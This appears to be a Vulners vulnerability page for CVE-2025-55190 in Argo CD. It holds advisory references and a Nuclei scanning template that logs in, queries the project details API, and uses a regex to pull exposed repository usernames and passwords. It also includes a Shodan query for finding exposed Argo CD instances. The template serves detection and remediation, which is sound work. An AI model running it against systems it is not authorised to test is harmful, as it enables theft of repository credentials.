| Reporter | Title | Published | Views | Family All 127 |
|---|---|---|---|---|
| The vulnerability of the declarative delivery tool for GitOps on Kubernetes Argo CD, related to insufficient protection of operational data, allows attackers to disclose protected information. | 17 Nov 202500:00 | – | bdu_fstec | |
| CVE-2025-55190 vulnerabilities | 6 Sep 202513:59 | – | cgr | |
| CVE-2025-55190 | 5 Sep 202503:09 | – | circl | |
| Argo CD 信息泄露漏洞 | 4 Sep 202500:00 | – | cnnvd | |
| CVE-2025-55190 | 4 Sep 202522:37 | – | cve | |
| CVE-2025-55190 Argo CD: Project API Token Exposes Repository Credentials | 4 Sep 202522:37 | – | cvelist | |
| EUVD-2025-26875 | 3 Oct 202520:07 | – | euvd | |
| Argo CD's Project API Token Exposes Repository Credentials | 4 Sep 202519:49 | – | github | |
| CVE-2025-55190 | 4 Sep 202523:15 | – | nvd | |
| BIT-ARGO-CD-2025-55190 Argo CD: Project API Token Exposes Repository Credentials | 9 Sep 202505:36 | – | osv |
id: CVE-2025-55190
info:
name: ArgoCD Project API Token Repository Credentials Exposure
author: nukunga[seunghyeonJeon]
severity: critical
description: |
Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
(usernames, passwords) through the project details API endpoint, even when the token only has standard
application management permissions and no explicit access to secrets. This vulnerability affects versions
v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
impact: |
Authenticated attackers with project-level API tokens can retrieve sensitive repository credentials including usernames and passwords without requiring explicit secret access permissions.
remediation: |
Upgrade ArgoCD to version 2.13.9, 2.14.16, 3.0.13, 3.1.2, or later depending on your version branch that properly restricts repository credential access.
reference:
- https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
- https://nvd.nist.gov/vuln/detail/CVE-2025-55190
- https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2025-55190
epss-score: 0.04518
epss-percentile: 0.90378
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
shodan-query: http.title:"argo cd"
tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes,vkev
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/session HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
extractors:
- type: json
name: token
part: body
internal: true
json:
- '.token'
- raw:
- |
GET /api/v1/projects/default/detailed HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"repositories":'
- '"username":'
- '"password":'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: exposed_credentials
part: body
group: 1
regex:
- '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 490a0046304402200903de9ae46b7574a2ec8e2354e5bbe1e3397699448678c853f5a29b8a5e71a2022019289cf7ddbcab072d87d60c0854ab7d946790822b090c7b71faa93916aaaf74:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation